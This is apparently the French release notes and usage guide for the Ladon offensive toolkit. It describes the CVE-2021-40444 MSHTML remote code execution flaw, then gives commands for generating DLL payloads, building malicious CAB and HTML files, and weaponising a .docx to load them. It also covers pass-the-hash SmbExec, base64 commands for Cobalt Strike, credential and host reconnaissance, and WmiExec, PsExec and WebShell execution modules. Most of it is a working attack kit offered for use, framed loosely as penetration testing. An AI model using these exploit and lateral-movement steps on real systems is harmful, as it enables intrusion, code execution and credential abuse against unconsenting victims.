
Kit d'exploitation pour l'exécution de code à distance CVE-2021-40444 MSHTML, comprenant la génération de charges utiles DLL, la création de documents Office et des modules de mouvement latéral (SmbExec, WmiExec) pour les tests de pénétration.
Le 8 septembre (heure de Pékin), le CERT de NSFOCUS a surveillé la publication par Microsoft d'un avis de sécurité divulguant la vulnérabilité d'exécution de code à distance dans Microsoft MSHTML. Un attaquant peut créer un contrôle ActiveX malveillant destiné à être utilisé par les documents Microsoft Office exploitant le moteur de rendu du navigateur. En incitant l'utilisateur à ouvrir le document malveillant, l'attaquant peut exécuter du code arbitraire sur le système cible avec les privilèges de cet utilisateur. Microsoft a indiqué dans l'avis que cette vulnérabilité est exploitée dans la nature et demande aux utilisateurs concernés de prendre des mesures de protection.
MSHTML (également connu sous le nom de Trident) est le moteur du navigateur Internet Explorer de Microsoft. Il est également utilisé par les applications Office pour afficher du contenu hébergé sur le Web dans les documents Word, Excel ou PowerPoint. Les contrôles ActiveX sont issus de l'architecture COM de Microsoft et sont largement utilisés dans la suite Office et le navigateur IE de Windows. L'utilisation de contrôles ActiveX permet d'interagir avec le composant MSHTML.
Inclut Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
Ladon 8.9 2021.9.14 [+] CVE-2021-40444 Vulnérabilité d'exécution de code à distance dans Microsoft MSHTML, module d'exploitation de documents Office Versions affectées : Inclut Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 [+] CmdDll Conversion cmd en DLL (payload DLL pour exploit 0day Windows, peut être utilisé directement par PowerShell pour se connecter à CobaltStrike) Vulnérabilités de débordement comme MS17010, élévation de privilèges locale CVE-2021-1675, etc., non-débordement comme la dernière vulnérabilité Office CVE-2021-40444, etc.
Ladon 8.8 2021.9.11 [+] SmbExec Exécution non interactive sans retour via NTLM-HASH [u] GetInfo Ajout d'informations sur la machine virtuelle VMware [u] OsScan Ajout de la reconnaissance du routeur Vigor [u] Ajout de la reconnaissance des machines virtuelles Xen\VBOX\Hybrid\Parallels [+] GetInfo Ajout de cmdkey, RrpLog, pilotes installés, liste de logiciels, fichiers récemment consultés, etc. [+] GetInfo Ajout de GUID, CPUID, ID de disque, détection de backdoor au démarrage (DLL persistante, registre, etc.) [+] GetInfo2 Ajout de la récupération des informations de correctifs via WMI [+] Informations par défaut Ajout d'un avertissement en surbrillance si l'espace libre du lecteur C est inférieur à 2 Go
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Veuillez générer la DLL avec la commande CMD correspondante selon vos besoins réels ; l'exemple ci-dessus lance la calculatrice.
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
PS : Ce module nécessite l'utilisation de Ladon40.exe
Win10 x64 Office 2019
Prenez simplement une version d'essai ; il n'est pas nécessaire de l'activer. Si vous téléchargez un fichier IMG, renommez-le en ZIP et décompressez-le pour l'installer.
Comme la cible est un système Win10 X64, nous utilisons une DLL 64 bits. Commande : Ladon CVE-2021-40444 MakeCab sc64.dll
Génère le fichier html. L'URL doit pointer vers l'adresse d'écoute de Ladon.
L'échantillon a été publié le 10 septembre dans le petit cercle. Renommez l'extension .docx en .cab ou .zip pour pouvoir éditer le fichier .rels, pointez vers l'adresse d'écoute de Ladon poc.html, enregistrez, puis renommez à nouveau en .docx.
En exécutant le fichier doc sur Windows 10, vous pouvez voir tout le processus de requête via l'écoute de Ladon. Le docx accède d'abord au html, puis la vulnérabilité déclenche le chargement de notre fichier CAB encapsulé, exécute l'installation INF via CPL, charge notre DLL. La démo de la DLL lance la calculatrice.
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA
Dans le shell de Cobalt Strike, pour exécuter SmbExec avec des paramètres contenant des espaces ou des guillemets, il y a des problèmes d'échappement CS. Utiliser des commandes CMD normales est fastidieux, j'ai donc ajouté un paramètre b64cmd pour faciliter l'utilisation sous CS (cette méthode était déjà utilisée dans BypassUac il y a quelques mois ; beaucoup de gens ne comprennent pas pourquoi faire ainsi, ne pourrait-on pas utiliser directement une commande CMD ? Mais quand la commande CMD contient beaucoup d'échappements, c'est fastidieux : il faut d'abord passer par l'échappement CS, puis l'échappement CMD pour obtenir une commande CMD normale). La commande b64cmd peut être générée via LadonGUI version 8.2 ou ultérieure en utilisant le cryptage Base64Unicode.
PowerLadon: https://github.com/k8gege/PowerLadon Versions historiques: http://github.com/k8gege/Ladon/releases Version 7.0 : http://k8gege.org/Download Version 8.9 : K8 petit cercle
| ID | Nom du module | Description | Utilisation |
|---|
| 1 | WmiExec | Exécution de commandes sur le port 135 | http://k8gege.org/Ladon/WinShell.html |
| 2 | PsExec | Exécution de commandes sur le port 445 | http://k8gege.org/Ladon/WinShell.html |
| 3 | AtExec | Exécution de commandes sur le port 445 | http://k8gege.org/Ladon/WinShell.html |
| 4 | SshExec | Exécution de commandes sur le port 22 | http://k8gege.org/Ladon/WinShell.html |
| 5 | JspShell | Exécution de commandes via JSP one-liner | http://k8gege.org/p/ladon_cs_shell.html |
| 6 | WebShell | Exécution de commandes via WebShell | http://k8gege.org/Ladon/webshell.html |
| 7 | WinrmExec | Exécution de commandes sur le port 5985 | http://k8gege.org/Ladon/WinrmExec.html |
| 8 | SmbExec | Exécution de commandes via HASH sur le port 445 | http://k8gege.org/Ladon/SmbExec.html |